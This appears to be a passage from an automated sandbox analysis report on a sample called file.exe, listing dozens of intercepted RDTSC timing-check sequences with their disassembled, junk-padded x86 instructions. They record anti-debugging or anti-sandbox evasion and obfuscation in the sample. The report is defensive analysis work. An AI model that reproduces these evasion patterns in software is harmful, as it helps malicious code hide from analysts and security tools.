                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8BFB second address: 10D8C2C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD648BC9AD3h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007FD648BC9ACCh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9154 second address: 10E9158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9158 second address: 10E9165 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B88EF second address: 10B88F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7067 second address: 10E706B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E706B second address: 10E707B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD648C0B44Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E707B second address: 10E708C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9ACDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7462 second address: 10E7467 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7467 second address: 10E748A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD648BC9AC6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648BC9AD6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E75C7 second address: 10E75DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FD648C0B44Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7BF8 second address: 10E7C0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD648BC9ACEh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7E65 second address: 10E7E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD648C0B446h 0x0000000a js 00007FD648C0B446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7E77 second address: 10E7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FD648BC9AC8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7E84 second address: 10E7EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD648C0B44Ch 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7EA2 second address: 10E7EB2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7EB2 second address: 10E7EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8057 second address: 10E805D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E805D second address: 10E8063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E872B second address: 10E873C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FD648BC9AC6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E873C second address: 10E8742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8742 second address: 10E8747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E88C9 second address: 10E88D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A19 second address: 10E8A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A23 second address: 10E8A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A28 second address: 10E8A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A2E second address: 10E8A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B457h 0x00000007 jmp 00007FD648C0B457h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FD648C0B453h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A76 second address: 10E8A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A7C second address: 10E8A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD648C0B44Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A96 second address: 10E8A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A9A second address: 10E8A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8A9E second address: 10E8AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD648BC9ACAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648BC9AD9h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8AC9 second address: 10E8ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8C55 second address: 10E8C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9ACEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8C67 second address: 10E8C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8C70 second address: 10E8C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD648BC9AC6h 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8C7B second address: 10E8C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD648C0B446h 0x0000000a jg 00007FD648C0B446h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9000 second address: 10E9027 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD648BC9AC6h 0x00000008 jmp 00007FD648BC9ACCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD648BC9ACFh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F08F3 second address: 10F0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD648C0B450h 0x0000000a popad 0x0000000b push ebx 0x0000000c jg 00007FD648C0B452h 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0921 second address: 10F0927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD7D6 second address: 10BD7FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD648C0B457h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FD648C0B446h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAB25 second address: 10FAB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAB29 second address: 10FAB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B452h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAB3F second address: 10FAB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FABCC second address: 10FABD6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD648C0B446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FABD6 second address: 10FAC18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FD648BC9AD8h 0x00000012 pop eax 0x00000013 movzx esi, si 0x00000016 or di, 23AAh 0x0000001b push F8F00F5Ah 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jg 00007FD648BC9AC6h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAC18 second address: 10FAC30 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD648C0B446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD648C0B44Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAC30 second address: 10FAC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAD79 second address: 10FAD9F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD648C0B45Ch 0x00000008 jmp 00007FD648C0B456h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAD9F second address: 10FADBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD8h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAF0E second address: 10FAF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB260 second address: 10FB265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB71C second address: 10FB720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB78B second address: 10FB790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB980 second address: 10FB989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBDD0 second address: 10FBE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FD648BC9AD7h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FD648BC9AC8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call 00007FD648BC9AD7h 0x0000002b cld 0x0000002c pop edi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 js 00007FD648BC9AC8h 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFF4C second address: 10FFF52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFC68 second address: 10FFC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFC6C second address: 10FFC72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFC72 second address: 10FFC77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA2EB second address: 10BA2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA2F1 second address: 10BA323 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FD648BC9AD2h 0x00000010 jmp 00007FD648BC9AD4h 0x00000015 pop ebx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA323 second address: 10BA33F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B458h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA33F second address: 10BA343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA343 second address: 10BA34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102170 second address: 11021AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007FD648BC9ADCh 0x0000000b jmp 00007FD648BC9AD6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD648BC9AD5h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11021AB second address: 11021AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11021AF second address: 1102216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1BAEh], edi 0x0000000e mov dword ptr [ebp+124887AEh], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FD648BC9AC8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov esi, dword ptr [ebp+12488860h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007FD648BC9AC8h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102216 second address: 110221A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110221A second address: 110221E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110221E second address: 1102224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102D7E second address: 1102D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105F7F second address: 1105FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD648C0B457h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110703F second address: 1107045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ACB8D second address: 10ACB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11071B2 second address: 11071B7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ACB93 second address: 10ACBA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FD648C0B446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ACBA5 second address: 10ACBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ACBA9 second address: 10ACBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD648C0B459h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ACBD0 second address: 10ACBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110960D second address: 1109613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A5CF second address: 110A5F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FD648BC9AC6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD648BC9AD2h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A5F1 second address: 110A5FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11097C3 second address: 11097C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A5FB second address: 110A5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110C60E second address: 110C613 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110C613 second address: 110C648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007FD648C0B450h 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D29A8h] 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+122D2C3Ah] 0x0000001d push 00000000h 0x0000001f mov bh, D5h 0x00000021 xchg eax, esi 0x00000022 push ecx 0x00000023 jc 00007FD648C0B44Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B8B1 second address: 110B8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110C648 second address: 110C65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007FD648C0B446h 0x0000000f jnc 00007FD648C0B446h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D562 second address: 110D571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9ACAh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D571 second address: 110D585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B450h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110C850 second address: 110C854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D7F9 second address: 110D7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110F4EE second address: 110F562 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD648BC9ACDh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FD648BC9AC8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov ebx, 4E4DC45Dh 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007FD648BC9AC8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FD648BC9AD2h 0x00000052 push edx 0x00000053 pop edx 0x00000054 popad 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E86C second address: 110E876 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD648C0B44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
